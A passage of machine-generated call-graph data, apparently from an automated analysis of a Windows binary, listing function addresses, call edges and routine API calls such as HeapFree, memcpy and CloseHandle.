56788->56686 56788->56687 56790 7ff768c45a40 56789->56790 56791 7ff768b7875f 56789->56791 56792 7ff768c45a5a 56790->56792 56793 7ff768c45a46 HeapFree 56790->56793 56796 7ff768b79ab9 56791->56796 56828 7ff768bfb240 56791->56828 56792->56692 56793->56792 56797 7ff768b79acb 56796->56797 56798 7ff768c8fa34 HeapFree 56796->56798 56799 7ff768c8fa47 56796->56799 56797->56692 56798->56799 56800 7ff768c8fa6c 56799->56800 56801 7ff768c8fa54 HeapFree 56799->56801 56800->56692 56801->56800 56803 7ff768bad0e0 3 API calls 56802->56803 56804 7ff768bfb21a 56803->56804 56805 7ff768bfb21f 56804->56805 56806 7ff768db9d40 4 API calls 56804->56806 56805->56688 56807 7ff768bfb23e 56806->56807 56808->56706 56809->56701 56810->56707 56811->56708 56812->56736 56813->56714 56814->56714 56815->56749 56816->56755 56817->56752 56818->56715 56819->56770 56820->56770 56821->56770 56822->56770 56823->56729 56824->56755 56825->56763 56826->56722 56827->56776 56829 7ff768bfb251 56828->56829 56830 7ff768b7877c HeapFree 56829->56830 56831 7ff768bfb26a HeapFree 56829->56831 56830->56791 56831->56830 56832 7ff768d805d0 56833 7ff768d80649 56832->56833 56846 7ff768d806e8 56832->56846 56835 7ff768d8065e 56833->56835 56833->56846 56863 7ff768d64c44 strlen memcpy 56835->56863 56838 7ff768d80668 56840 7ff768d80670 strlen 56838->56840 56841 7ff768d806d1 56838->56841 56839 7ff768d807ee memcpy 56842 7ff768d80864 memcpy 56839->56842 56853 7ff768d80909 56839->56853 56850 7ff768d80689 56840->56850 56843 7ff768d80899 56842->56843 56844 7ff768d80884 memcpy 56842->56844 56845 7ff768d8089c memcpy memcpy memcpy memcpy 56843->56845 56844->56845 56845->56853 56846->56841 56847 7ff768d80757 strlen strlen 56846->56847 56846->56850 56848 7ff768d8078b strlen strlen 56847->56848 56847->56850 56848->56848 56848->56850 56850->56841 56854 7ff768d7f0a0 56850->56854 56851 7ff768d80a78 56851->56841 56852 7ff768d80a82 memset 56851->56852 56852->56841 56853->56841 56858 7ff768d81024 56853->56858 56855 7ff768d7f0b2 56854->56855 56856 7ff768d7f0ba memset 56855->56856 56857 7ff768d7f0c7 56855->56857 56856->56857 56857->56839 56857->56841 56859 7ff768d8104d 56858->56859 56860 7ff768d810ef memset 56859->56860 56862 7ff768d810a1 56859->56862 56864 7ff768d4cf40 56860->56864 56862->56851 56863->56838 56865 7ff768d4cf4c 56864->56865 56866 7ff768d822f2 56865->56866 56867 7ff768d822e2 memset 56865->56867 56866->56862 56867->56866 56868 7ff768b99b2d 56940 7ff768b98e3c 56868->56940 56869 7ff768b99768 HeapFree 56869->56940 56870 7ff768b99227 HeapFree 56870->56940 56871 7ff768bf799f 11 API calls 56871->56940 56872 7ff768c63650 23 API calls 56872->56940 56873 7ff768b9a61c 56874 7ff768b77ea7 16 API calls 56874->56940 56875 7ff768c642c0 2 API calls 56875->56940 56876 7ff768b99bd9 HeapFree 56876->56940 56877 7ff768b99c09 56878 7ff768b7996a 2 API calls 56877->56878 56879 7ff768b99c19 56878->56879 56882 7ff768b7691c 15 API calls 56879->56882 56880 7ff768c67140 32 API calls 56880->56940 56881 7ff768befd87 4 API calls 56881->56940 56883 7ff768b99c34 56882->56883 56884 7ff768b9a7e1 56883->56884 56885 7ff768b99c67 CloseHandle 56883->56885 56889 7ff768b99e1c 56883->56889 56943 7ff768dbb1c8 HeapAlloc GetProcessHeap HeapAlloc HeapReAlloc 56884->56943 56888 7ff768b99c7b 56885->56888 56885->56889 56886 7ff768c7c920 5 API calls 56886->56940 56887 7ff768b991ba RtlDeleteBoundaryDescriptor 56887->56940 56894 7ff768bb09e0 5 API calls 56888->56894 56891 7ff768b99e60 HeapFree 56889->56891 56892 7ff768b99e72 56889->56892 56891->56892 56898 7ff768b99e8a HeapFree 56892->56898 56907 7ff768b99e0a 56892->56907 56893 7ff768b79a8e HeapFree CloseHandle HeapFree HeapFree HeapFree 56893->56940 56895 7ff768b99d56 56894->56895 56896 7ff768c7c630 24 API calls 56895->56896 56899 7ff768b99d83 56896->56899 56897 7ff768b99185 memcmp 56897->56940 56898->56907 56901 7ff768b99d8a HeapFree 56899->56901 56902 7ff768b99d9c 56899->56902 56900 7ff768b99eac HeapFree 56909 7ff768b99ec3 56900->56909 56901->56902 56903 7ff768b99da7 HeapFree 56902->56903 56905 7ff768b99dbe 56902->56905 56903->56905 56904 7ff768c64db0 15 API calls 56904->56940 56906 7ff768b99df8 HeapFree 56905->56906 56905->56907 56906->56907 56907->56900 56907->56909 56908 7ff768b9a6dc 56909->56908 56910 7ff768bb09e0 5 API calls 56909->56910 56911 7ff768b9a0a9 56910->56911 56912 7ff768b9a0b4 HeapFree 56911->56912 56913 7ff768b9a0cb 56911->56913 56912->56913 56914 7ff768c67140 32 API calls 56913->56914 56915 7ff768b9a0fc 56914->56915 56917 7ff768bb09e0 5 API calls 56915->56917 56918 7ff768b9a101 56915->56918 56916 7ff768bb5a43 5 API calls 56916->56940 56925 7ff768b9a227 56917->56925 56919 7ff768b9a14a HeapFree 56918->56919 56920 7ff768b9a15c 56918->56920 56919->56920 56921 7ff768b9a164 HeapFree 56920->56921 56922 7ff768b9a178 56920->56922 56921->56922 56923 7ff768b9a186 HeapFree 56922->56923 56924 7ff768b9a199 56922->56924 56923->56924 56927 7ff768c7c920 5 API calls 56925->56927 56934 7ff768b9a25f 56927->56934 56928 7ff768b9a571 56930 7ff768b77ea7 16 API calls 56928->56930 56929 7ff768c77b30 12 API calls 56929->56934 56930->56918 56931 7ff768c97a30 6 API calls 56931->56940 56932 7ff768b9a41e HeapFree 56932->56934 56933 7ff768b9a55a HeapFree 56933->56934 56934->56873 56934->56928 56934->56929 56934->56932 56934->56933 56935 7ff768bb09e0 5 API calls 56934->56935 56936 7ff768c7c630 24 API calls 56934->56936 56937 7ff768b9a537 HeapFree 56934->56937 56935->56934 56936->56934 56937->56934 56938 7ff768c64e00 SetFilePointerEx GetLastError 56938->56940 56939 7ff768b99821 memcpy 56939->56940 56940->56869 56940->56870 56940->56871 56940->56872 56940->56873 56940->56874 56940->56875 56940->56876 56940->56877 56940->56880 56940->56881 56940->56884 56940->56886 56940->56887 56940->56893 56940->56897 56940->56904 56940->56916 56940->56931 56940->56938 56940->56939 56941 7ff768b7a180 10 API calls 56940->56941 56942 7ff768b78984 HeapFree HeapFree HeapFree HeapFree 56940->56942 56941->56940 56942->56940 56944 7ff768ba8e46 56945 7ff768ba8e4d 56944->56945 56946 7ff768ba8e5d 56945->56946 56951 7ff768ba8ea7 56945->56951 56948 7ff768ba8f3e 56946->56948 57516 7ff768c7d1af memcpy 56946->57516 56949 7ff768ba9012 HeapFree 56950 7ff768ba9027 CloseHandle 56949->56950 56964 7ff768ba8a03 56950->56964 56951->56948 56954 7ff768c983ac 7 API calls 56951->56954 56951->56964 56952 7ff768ba92d5 HeapFree 56952->56964 56953 7ff768c64e70 8 API calls 56953->56964 56954->56964 56955 7ff768baa748 57532 7ff768c46dce HeapFree HeapFree HeapFree 56955->57532 56956 7ff768ba8afc memcpy 56958 7ff768c650c0 13 API calls 56956->56958 56957 7ff768c9ab60 FindClose 56957->56964 56959 7ff768ba8b36 56958->56959 56963 7ff768bb471f 7 API calls 56959->56963 57515 7ff768c8fa25 HeapFree HeapFree 56959->57515 56960 7ff768bab10a 57452 7ff768c99df8 56960->57452 56966 7ff768ba8b67 memcpy 56963->56966 56964->56948 56964->56949 56964->56950 56964->56952 56964->56953 56964->56955 56964->56956 56964->56957 56964->56960 56974 7ff768ba8a7e memcpy memcpy 56964->56974 56978 7ff768ba8bc4 HeapFree 56964->56978 56983 7ff768ba934e 56964->56983 56993 7ff768bab27f 56964->56993 56999 7ff768c63650 23 API calls 56964->56999 57003 7ff768c64db0 15 API calls 56964->57003 57005 7ff768c971b8 15 API calls 56964->57005 57027 7ff768c98e30 18 API calls 56964->57027 57033 7ff768bb471f 7 API calls 56964->57033 57041 7ff768c95918 10 API calls 56964->57041 57042 7ff768ba92b5 HeapFree 56964->57042 57044 7ff768baab1b 56964->57044 57160 7ff768c97529 56964->57160 57517 7ff768c7d1af memcpy 56964->57517 56965 7ff768baa7d5 56969 7ff768baa7e6 HeapFree 56965->56969 56970 7ff768baa7f8 56965->56970 56971 7ff768c67140 32 API calls 56966->56971 56969->56970 56973 7ff768bb09e0 5 API calls 56970->56973 56971->56964 56972 7ff768bab1f4 56976 7ff768bab224 CloseHandle 56972->56976 56981 7ff768bac760 56972->56981 56972->56993 56975 7ff768baa85e 56973->56975 56974->56964 56977 7ff768bb4a01 4 API calls 56975->56977 56979 7ff768bab251 56976->56979 56980 7ff768bab234 RtlDeleteBoundaryDescriptor 56976->56980 56982 7ff768baa878 56977->56982 56978->56964 56979->56993 56994 7ff768bab26d HeapFree 56979->56994 56980->56979 57570 7ff768c61400 HeapFree HeapFree 56981->57570 56987 7ff768bad0e0 3 API calls 56982->56987 56985 7ff768ba9358 HeapFree 56983->56985 56986 7ff768ba936e 56983->56986 56984 7ff768bab2dc HeapFree 56984->56983 56988 7ff768baa978 56984->56988 56985->56986 56990 7ff768c9ab60 FindClose 56986->56990 56991 7ff768baa887 56987->56991 56996 7ff768ba937a 56990->56996 56997 7ff768baa890 56991->56997 57006 7ff768babdf5 56991->57006 56992 7ff768baade5 memcpy memcpy 57550 7ff768b7eb04 56992->57550 56993->56983 56993->56984 56994->56993 56995 7ff768bac7ff 57000 7ff768ba9384 HeapFree 56996->57000 57001 7ff768ba939a 56996->57001 57533 7ff768c479a8 6 API calls 56997->57533 56999->56964 57000->57001 57007 7ff768ba93ba HeapFree 57001->57007 57008 7ff768ba93cc 57001->57008 57003->56964 57004 7ff768db9d40 4 API calls 57004->57006 57005->56964 57006->57004 57007->57008 57014 7ff768c99df8 19 API calls 57008->57014 57029 7ff768ba947c 57008->57029 57009 7ff768baa8e2 memcpy 57010 7ff768baa4ff 57009->57010 57334 7ff768c47a98 57010->57334 57011 7ff768baa790 57011->57009 57018 7ff768ba93ef 57014->57018 57017 7ff768ba94a8 57020 7ff768ba94d7 57017->57020 57519 7ff768b78984 HeapFree HeapFree HeapFree HeapFree 57017->57519 57018->57029 57518 7ff768c68320 AcquireSRWLockExclusive HeapFree HeapFree ReleaseSRWLockExclusive 57018->57518 57022 7ff768ba94e1 HeapFree 57020->57022 57023 7ff768ba94f7 57020->57023 57021 7ff768baa96e 57021->56988 57534 7ff768b78d9c 57021->57534 57022->57023 57025 7ff768ba9501 HeapFree 57023->57025 57026 7ff768ba9517 57023->57026 57025->57026 57026->56948 57031 7ff768ba9540 57026->57031 57032 7ff768ba952a HeapFree 57026->57032 57027->56964 57166 7ff768c983ac 57029->57166 57035 7ff768ba9558 HeapFree 57031->57035 57036 7ff768ba956e 57031->57036 57032->57031 57037 7ff768ba9226 memcpy 57033->57037 57035->57036 57039 7ff768ba9573 HeapFree 57036->57039 57040 7ff768ba9589 57036->57040 57037->56964 57038 7ff768baa9d3 memcpy memcpy memcpy memcpy 57038->57044 57039->57040 57043 7ff768bbeb00 memcmp 57040->57043 57041->56964 57042->56964 57049 7ff768ba95f6 57043->57049 57044->56992 57045 7ff768b7efb1 23 API calls 57045->57049 57046 7ff768ba965e 57048 7ff768bf799f 11 API calls 57046->57048 57047 7ff768bf799f 11 API calls 57047->57049 57050 7ff768ba9676 57048->57050 57049->57045 57049->57046 57049->57047 57051 7ff768bb09e0 5 API calls 57050->57051 57052 7ff768ba96f1 57051->57052 57053 7ff768ba9711 57052->57053 57054 7ff768ba96fb HeapFree 57052->57054 57055 7ff768ba9722 HeapFree 57053->57055 57056 7ff768ba9738 57053->57056 57054->57053 57055->57056 57173 7ff768c46f84 57056->57173 57105 7ff768babff4 57161 7ff768c97553 57160->57161 57162 7ff768c9756a memcpy 57161->57162 57163 7ff768c97559 57161->57163 57162->57163 57164 7ff768c975a2 57163->57164 57165 7ff768c97583 HeapFree 57163->57165 57164->56964 57165->57164 57167 7ff768c983d1 57166->57167 57169 7ff768b798d3 57166->57169 57167->57017 57168 7ff768c983db CloseHandle 57169->57167 57169->57168 57170 7ff768b798e8 CloseHandle 57169->57170 57171 7ff768b798f2 HeapFree HeapFree HeapFree HeapFree 57169->57171 57170->57171 57172 7ff768b79946 HeapFree 57171->57172 57172->57166 57571 7ff768bde207 57173->57571 57177 7ff768c46fd5 57582 7ff768bde275 57177->57582 57181 7ff768c471d2 57336 7ff768c47aff 57334->57336 57377 7ff768baa944 memcpy 57334->57377 57335 7ff768c47cd2 57739 7ff768bfd2fc HeapFree 57335->57739 57336->57335 57337 7ff768c47c2b 57336->57337 57338 7ff768c47c13 memcmp 57336->57338 57340 7ff768c47c06 57336->57340 57337->57335 57337->57340 57342 7ff768c47c4c memcmp 57337->57342 57338->57337 57338->57340 57340->57335 57344 7ff768c47cb6 memcmp 57340->57344 57354 7ff768c47e18 57340->57354 57341 7ff768c47cf1 57343 7ff768bfb91a 3 API calls 57341->57343 57342->57335 57342->57340 57345 7ff768c47d64 57343->57345 57344->57335 57344->57354 57346 7ff768c47d70 HeapFree 57345->57346 57345->57377 57346->57377 57347 7ff768c480b2 57348 7ff768c48729 57347->57348 57351 7ff768befd87 4 API calls 57347->57351 57368 7ff768be62c3 12 API calls 57347->57368 57685 7ff768bd0f31 57348->57685 57350 7ff768c488b5 memcpy 57352 7ff768c488f7 57350->57352 57353 7ff768c48de9 memcpy 57351->57353 57356 7ff768c4890b memcpy 57352->57356 57357 7ff768c48967 memcpy 57352->57357 57741 7ff768bb4b21 6 API calls 57353->57741 57354->57347 57361 7ff768c47f7d memcmp 57354->57361 57356->57357 57358 7ff768c48c62 57357->57358 57359 7ff768c48a0a memcpy 57357->57359 57370 7ff768db9d40 4 API calls 57358->57370 57358->57377 57360 7ff768c48ad0 57359->57360 57362 7ff768c48b0a 57360->57362 57367 7ff768bad0e0 3 API calls 57360->57367 57361->57354 57362->57358 57363 7ff768bde207 4 API calls 57362->57363 57364 7ff768c48b66 memcpy 57363->57364 57365 7ff768c48b9b 57364->57365 57366 7ff768c48bae 57364->57366 57740 7ff768bde159 6 API calls 57365->57740 57694 7ff768c38971 57366->57694 57367->57362 57368->57347 57371 7ff768c48f26 57370->57371 57378 7ff768c363f0 57377->57378 57379 7ff768c36442 57378->57379 57391 7ff768c3641f 57378->57391 57380 7ff768c36575 57379->57380 57400 7ff768c3667a 57379->57400 57427 7ff768c374de 57379->57427 57381 7ff768c3657e memcpy 57380->57381 57380->57391 57390 7ff768c3665c 57381->57390 57395 7ff768c365ab 57381->57395 57382 7ff768c37f7b 57756 7ff768bfca1f HeapAlloc GetProcessHeap HeapAlloc HeapReAlloc 57382->57756 57384 7ff768c37f90 57387 7ff768bad0e0 3 API calls 57384->57387 57385 7ff768c38084 memcpy 57386 7ff768bb17c0 57385->57386 57388 7ff768c380c0 memcpy 57386->57388 57389 7ff768c37fa2 57387->57389 57392 7ff768bad0e0 3 API calls 57388->57392 57398 7ff768c381a3 57389->57398 57389->57427 57390->57385 57399 7ff768c89bf9 78 API calls 57390->57399 57391->57021 57394 7ff768c3816e 57392->57394 57397 7ff768bad0e0 3 API calls 57394->57397 57394->57398 57395->57390 57401 7ff768c36646 HeapFree 57395->57401 57396 7ff768db9d40 4 API calls 57396->57391 57397->57398 57398->57391 57398->57396 57402 7ff768c367cf 57399->57402 57400->57382 57412 7ff768c3687c 57400->57412 57401->57390 57402->57385 57403 7ff768bb471f 7 API calls 57402->57403 57404 7ff768c36835 memcpy 57403->57404 57405 7ff768bb4a01 4 API calls 57404->57405 57405->57412 57406 7ff768c36a5a memcmp 57407 7ff768c36a71 57406->57407 57408 7ff768c36feb 57406->57408 57749 7ff768c8f321 19 API calls 57407->57749 57408->57391 57408->57407 57410 7ff768c37499 memcmp 57408->57410 57410->57407 57420 7ff768c3711f 57410->57420 57411 7ff768c3807e HeapFree 57411->57385 57412->57391 57412->57406 57412->57407 57419 7ff768c37e8d 57412->57419 57412->57420 57413 7ff768bd0bdf 8 API calls 57414 7ff768c37042 57413->57414 57417 7ff768c370a9 57414->57417 57418 7ff768c37095 HeapFree 57414->57418 57415 7ff768c36ae9 57415->57391 57415->57413 57416 7ff768c3723d 57424 7ff768c381fe 57416->57424 57426 7ff768c3724a 57416->57426 57417->57420 57421 7ff768be62c3 12 API calls 57417->57421 57418->57417 57419->57385 57419->57411 57420->57416 57420->57419 57422 7ff768c38058 57420->57422 57420->57426 57421->57420 57422->57419 57422->57424 57423 7ff768c37321 57425 7ff768c37342 HeapFree 57423->57425 57436 7ff768c37358 57423->57436 57758 7ff768bfd2fc HeapFree 57424->57758 57425->57436 57426->57391 57426->57423 57428 7ff768c37307 memcmp 57426->57428 57430 7ff768c37eaf 57426->57430 57757 7ff768bfd2fc HeapFree 57427->57757 57428->57423 57428->57430 57754 7ff768bfd2fc HeapFree 57430->57754 57431 7ff768c38296 57432 7ff768c382b9 HeapFree 57431->57432 57433 7ff768c37f49 57431->57433 57432->57433 57435 7ff768bfb91a 3 API calls 57433->57435 57438 7ff768c382dd 57435->57438 57436->57427 57440 7ff768c3741a memcmp 57436->57440 57445 7ff768c3742d 57436->57445 57437 7ff768c37f10 57755 7ff768bfd2fc HeapFree 57437->57755 57759 7ff768bd0efd HeapFree HeapFree HeapFree 57438->57759 57440->57445 57442 7ff768c37562 57751 7ff768be6b78 memcmp 57442->57751 57444 7ff768c382ea 57760 7ff768bfbb74 40 API calls 57444->57760 57445->57391 57445->57427 57750 7ff768be6b78 memcmp 57445->57750 57448 7ff768c375ac 57752 7ff768be6b78 memcmp 57448->57752 57450 7ff768c3762c 57753 7ff768be6b78 memcmp 57450->57753 57761 7ff768c997a2 57452->57761 57454 7ff768c99e26 57455 7ff768c99e59 57454->57455 57456 7ff768c64e00 2 API calls 57454->57456 57455->56972 57459 7ff768c99e53 57456->57459 57457 7ff768c9a0b6 57457->57455 57458 7ff768c64e00 2 API calls 57457->57458 57463 7ff768c9a38d 57458->57463 57459->57455 57459->57457 57460 7ff768c97a30 6 API calls 57459->57460 57461 7ff768c99f7d 57460->57461 57461->57455 57465 7ff768c97a30 6 API calls 57461->57465 57462 7ff768c9a588 57464 7ff768c97a30 6 API calls 57462->57464 57463->57455 57463->57462 57466 7ff768c9a3fe 57463->57466 57467 7ff768c9a5a6 57464->57467 57474 7ff768c99fa4 57465->57474 57468 7ff768bb471f 7 API calls 57466->57468 57467->57455 57469 7ff768c97a30 6 API calls 57467->57469 57470 7ff768c9a422 memcpy 57468->57470 57472 7ff768c9a5c9 57469->57472 57471 7ff768c97a30 6 API calls 57470->57471 57473 7ff768c9a46c 57471->57473 57472->57455 57476 7ff768c97a30 6 API calls 57472->57476 57475 7ff768c9a558 57473->57475 57478 7ff768c97a30 6 API calls 57473->57478 57474->57455 57477 7ff768c97a30 6 API calls 57474->57477 57475->57455 57480 7ff768c9a571 HeapFree 57475->57480 57479 7ff768c9a5ea 57476->57479 57487 7ff768c9a02b 57477->57487 57481 7ff768c9a48d 57478->57481 57479->57455 57482 7ff768c97a30 6 API calls 57479->57482 57480->57455 57481->57475 57483 7ff768c97a30 6 API calls 57481->57483 57484 7ff768c9a60b 57482->57484 57485 7ff768c9a4ae 57483->57485 57484->57455 57486 7ff768c97a30 6 API calls 57484->57486 57485->57475 57489 7ff768c97a30 6 API calls 57485->57489 57490 7ff768c9a62d 57486->57490 57487->57455 57488 7ff768c97a30 6 API calls 57487->57488 57488->57457 57491 7ff768c9a4cd 57489->57491 57490->57455 57492 7ff768c97a30 6 API calls 57490->57492 57491->57475 57493 7ff768c97a30 6 API calls 57491->57493 57494 7ff768c9a64f 57492->57494 57495 7ff768c9a4ec 57493->57495 57494->57455 57496 7ff768c97a30 6 API calls 57494->57496 57495->57475 57498 7ff768c97a30 6 API calls 57495->57498 57497 7ff768c9a66e 57496->57497 57497->57455 57500 7ff768c97a30 6 API calls 57497->57500 57499 7ff768c9a506 57498->57499 57499->57475 57501 7ff768c97a30 6 API calls 57499->57501 57502 7ff768c9a68d 57500->57502 57503 7ff768c9a520 57501->57503 57502->57455 57504 7ff768c97a30 6 API calls 57502->57504 57503->57475 57505 7ff768c97a30 6 API calls 57503->57505 57506 7ff768c9a6ac 57504->57506 57507 7ff768c9a53c 57505->57507 57506->57455 57508 7ff768c97a30 6 API calls 57506->57508 57507->57475 57509 7ff768c97a30 6 API calls 57507->57509 57510 7ff768c9a6d0 57508->57510 57511 7ff768c9a54f 57509->57511 57510->57455 57805 7ff768c98d93 6 API calls 57510->57805 57511->57475 57512 7ff768c9a6ff 57511->57512 57512->57455 57514 7ff768c9a71b HeapFree 57512->57514 57514->57455 57515->56959 57516->56964 57517->56964 57518->57029 57519->57017 57532->56965 57533->57011 57536 7ff768b78db3 57534->57536 57535 7ff768b78dfa 57538 7ff768b78e1a 57535->57538 57539 7ff768b78e04 HeapFree 57535->57539 57536->57535 57537 7ff768b78de4 HeapFree 57536->57537 57547 7ff768b78efd 57536->57547 57537->57535 57540 7ff768bfb91a 3 API calls 57538->57540 57539->57538 57542 7ff768b78e22 57540->57542 57541 7ff768b78e91 57543 7ff768b78e9b HeapFree 57541->57543 57544 7ff768b78eb1 57541->57544 57542->57541 57545 7ff768b78e77 HeapFree 57542->57545 57543->57544 57548 7ff768b78eca 57544->57548 57808 7ff768c36322 14 API calls 57544->57808 57545->57542 57547->57038 57547->57105 57548->57547 57549 7ff768b78eee HeapFree 57548->57549 57549->57547 57551 7ff768b7eb2a 57550->57551 57552 7ff768b7eb57 memcpy memcpy 57550->57552 57551->57552 57553 7ff768b7edc9 57551->57553 57559 7ff768b7ebb1 57552->57559 57554 7ff768b7ec0b 57554->56988 57557 7ff768b7ec53 57810 7ff768b78f21 HeapFree 57557->57810 57559->57554 57559->57557 57560 7ff768befd87 4 API calls 57559->57560 57561 7ff768b7ed78 57560->57561 57809 7ff768c46e13 11 API calls 57561->57809 57570->56995 57573 7ff768bde247 57571->57573 57574 7ff768bde216 57571->57574 57572 7ff768bde242 57572->57573 57576 7ff768db9d40 4 API calls 57572->57576 57578 7ff768bde0e9 57573->57578 57574->57572 57575 7ff768bad0e0 3 API calls 57574->57575 57575->57572 57577 7ff768bde273 57576->57577 57579 7ff768bde148 57578->57579 57581 7ff768bde104 57578->57581 57605 7ff768dbb1e6 10 API calls 57579->57605 57581->57177 57604 7ff768bde159 6 API calls 57581->57604 57583 7ff768bde284 57582->57583 57584 7ff768bde2c5 57582->57584 57585 7ff768bad0e0 3 API calls 57583->57585 57586 7ff768bde2c0 57583->57586 57584->57181 57589 7ff768be62c3 57584->57589 57585->57586 57586->57584 57587 7ff768db9d40 4 API calls 57586->57587 57590 7ff768be6300 57589->57590 57604->57177 57605->57581 57686 7ff768bd0f93 memcpy 57685->57686 57687 7ff768bd0f66 57685->57687 57690 7ff768bd1020 57686->57690 57692 7ff768bd0ffe 57686->57692 57688 7ff768bd10d8 memcpy 57687->57688 57691 7ff768bd0f7f HeapFree 57687->57691 57688->57350 57689 7ff768bd1050 memcpy 57689->57688 57690->57689 57693 7ff768bd1039 HeapFree 57690->57693 57691->57688 57692->57688 57693->57689 57695 7ff768c38994 57694->57695 57698 7ff768c389d8 57694->57698 57739->57341 57740->57366 57741->57347 57749->57415 57750->57442 57751->57448 57752->57450 57753->57427 57754->57437 57755->57433 57756->57384 57757->57391 57758->57431 57759->57444 57760->57391 57762 7ff768c997c8 57761->57762 57798 7ff768c99891 57761->57798 57763 7ff768c997f8 57762->57763 57764 7ff768c99883 57762->57764 57765 7ff768c99c89 57762->57765 57770 7ff768c9986d 57762->57770 57763->57454 57764->57765 57767 7ff768c97a30 6 API calls 57764->57767 57764->57798 57772 7ff768db9d40 4 API calls 57765->57772 57766 7ff768c998c1 57766->57763 57768 7ff768c64e00 2 API calls 57766->57768 57769 7ff768c999ef 57767->57769 57771 7ff768c99a6c 57768->57771 57769->57763 57776 7ff768c64e00 2 API calls 57769->57776 57773 7ff768bb09e0 5 API calls 57770->57773 57771->57763 57779 7ff768c64e00 2 API calls 57771->57779 57775 7ff768c99cc0 57772->57775 57774 7ff768c9994c 57773->57774 57778 7ff768bad0e0 3 API calls 57774->57778 57780 7ff768c97a30 6 API calls 57775->57780 57777 7ff768c99a2b 57776->57777 57777->57763 57785 7ff768c97a30 6 API calls 57777->57785 57781 7ff768c9995b 57778->57781 57782 7ff768c99ab3 57779->57782 57783 7ff768c99cef 57780->57783 57781->57765 57784 7ff768c99964 57781->57784 57782->57763 57788 7ff768c97a30 6 API calls 57782->57788 57786 7ff768c99d42 57783->57786 57790 7ff768c97a30 6 API calls 57783->57790 57806 7ff768c67510 HeapAlloc GetProcessHeap HeapAlloc HeapReAlloc 57784->57806 57789 7ff768c99b0a 57785->57789 57786->57454 57791 7ff768c99b87 57788->57791 57789->57763 57793 7ff768c64e00 2 API calls 57789->57793 57792 7ff768c99d0c 57790->57792 57791->57763 57796 7ff768c97a30 6 API calls 57791->57796 57792->57786 57794 7ff768c97a30 6 API calls 57792->57794 57793->57798 57795 7ff768c99d27 57794->57795 57795->57786 57799 7ff768c97a30 6 API calls 57795->57799 57797 7ff768c99bc4 57796->57797 57797->57763 57800 7ff768c97a30 6 API calls 57797->57800 57798->57763 57798->57765 57798->57766 57799->57786 57801 7ff768c99bf2 57800->57801 57801->57763 57802 7ff768c99c13 57801->57802 57807 7ff768c99d61 8 API calls 57801->57807 57802->57763 57804 7ff768c64e00 2 API calls 57802->57804 57804->57763 57805->57512 57806->57763 57807->57802 57808->57548 57811 7ff768ba1fc3 FreeSid 57812 7ff768ba1fdf 57811->57812 57813 7ff768bb09e0 5 API calls 57812->57813 57814 7ff768ba2053 57813->57814 57815 7ff768c51b93 10 API calls 57814->57815 57816 7ff768ba206e 57814->57816 57815->57816 57816->57816 57817 7ff768befd87 4 API calls 57816->57817 57818 7ff768ba2194 57817->57818 57819 7ff768ba21ca 57818->57819 57820 7ff768c51b93 10 API calls 57818->57820 57821 7ff768c95ba2 3 API calls 57819->57821 57820->57819 57822 7ff768ba2218 57821->57822 57823 7ff768b75a3c 16 API calls 57822->57823 57841 7ff768ba4cf2 57822->57841 57846 7ff768ba2266 57823->57846 57824 7ff768ba24a9 57825 7ff768b77cd5 HeapFree 57824->57825 57826 7ff768ba24d5 57825->57826 57827 7ff768ba2520 57826->57827 57828 7ff768befd87 4 API calls 57826->57828 57830 7ff768bb09e0 5 API calls 57827->57830 57829 7ff768ba24ed 57828->57829 57829->57827 57831 7ff768ba250a HeapFree 57829->57831 57832 7ff768ba25fa 57830->57832 57831->57827 57833 7ff768ba2619 57832->57833 57834 7ff768c51b93 10 API calls 57832->57834 57835 7ff768ba2670 57833->57835 57836 7ff768ba265a HeapFree 57833->57836 57834->57833 57837 7ff768ba2690 HeapFree 57835->57837 57838 7ff768ba26a6 57835->57838 57836->57835 57837->57838 57839 7ff768ba26ab HeapFree 57838->57839 57840 7ff768ba26bd 57838->57840 57839->57840 57843 7ff768ba26c7 HeapFree 57840->57843 57844 7ff768ba26dd 57840->57844 57842 7ff768bb09e0 5 API calls 57842->57846 57843->57844 57845 7ff768ba2723 57844->57845 57849 7ff768ba2709 HeapFree 57844->57849 57847 7ff768ba272d HeapFree 57845->57847 57860 7ff768ba2743 57845->57860 57846->57824 57846->57841 57846->57842 57848 7ff768bf799f 11 API calls 57846->57848 57852 7ff768ba247e HeapFree 57846->57852 57847->57860 57848->57846 57849->57844 57850 7ff768ba294e 57851 7ff768ba2977 57850->57851 57853 7ff768ba2961 HeapFree 57850->57853 57854 7ff768ba4739 CloseHandle 57851->57854 57855 7ff768ba2997 57851->57855 57852->57846 57853->57851 57856 7ff768ba474b CloseHandle 57854->57856 57855->57856 57857 7ff768ba29b7 57855->57857 57861 7ff768ba475d CloseHandle 57856->57861 57857->57861 57864 7ff768ba29d7 57857->57864 57858 7ff768ba27af HeapFree 57858->57860 57859 7ff768babd90 58109 7ff768bad170 HeapFree 57859->58109 57860->57850 57860->57858 57860->57859 57863 7ff768ba2813 HeapFree 57860->57863 57865 7ff768ba282d HeapFree 57860->57865 57868 7ff768b780a0 2 API calls 57860->57868 57872 7ff768ba285c 57860->57872 57870 7ff768ba458a 57861->57870 57863->57860 57866 7ff768ba29e1 HeapFree 57864->57866 57867 7ff768ba29f7 57864->57867 57865->57860 57866->57867 57869 7ff768b77c7a HeapFree 57867->57869 57868->57860 57871 7ff768ba2a03 57869->57871 57877 7ff768b7996a 2 API calls 57870->57877 57873 7ff768ba2a23 57871->57873 57874 7ff768ba2a0d HeapFree 57871->57874 57878 7ff768ba2931 HeapFree 57872->57878 57875 7ff768ba2a43 57873->57875 57876 7ff768ba2a2d HeapFree 57873->57876 57874->57873 57879 7ff768b77c7a HeapFree 57875->57879 57876->57875 57880 7ff768ba4914 57877->57880 57878->57850 57878->57878 57881 7ff768ba2a4f 57879->57881 57882 7ff768b77b87 14 API calls 57880->57882 57883 7ff768ba2a6f 57881->57883 57884 7ff768ba2a59 HeapFree 57881->57884 57885 7ff768ba4920 57882->57885 57887 7ff768ba2a8f 57883->57887 57888 7ff768ba2a79 HeapFree 57883->57888 57884->57883 57886 7ff768b77b87 14 API calls 57885->57886 57889 7ff768ba492c 57886->57889 57888->57887 57892 7ff768ba4963 memcpy memcpy 57889->57892 57893 7ff768b902f0 187 API calls 57892->57893 58110 7ff768db9224 58111 7ff768db9234 58110->58111 58112 7ff768db92d9 58110->58112 58113 7ff768c51b12 9 API calls 58111->58113 58114 7ff768db92b6 58113->58114 58114->58112 58115 7ff768db9d40 4 API calls 58114->58115 58116 7ff768db92f4 58115->58116 58117 7ff768b834b8 58822 7ff768b808f1 58117->58822 58119 7ff768b834eb 58121 7ff768b835c2 58119->58121 58122 7ff768b83582 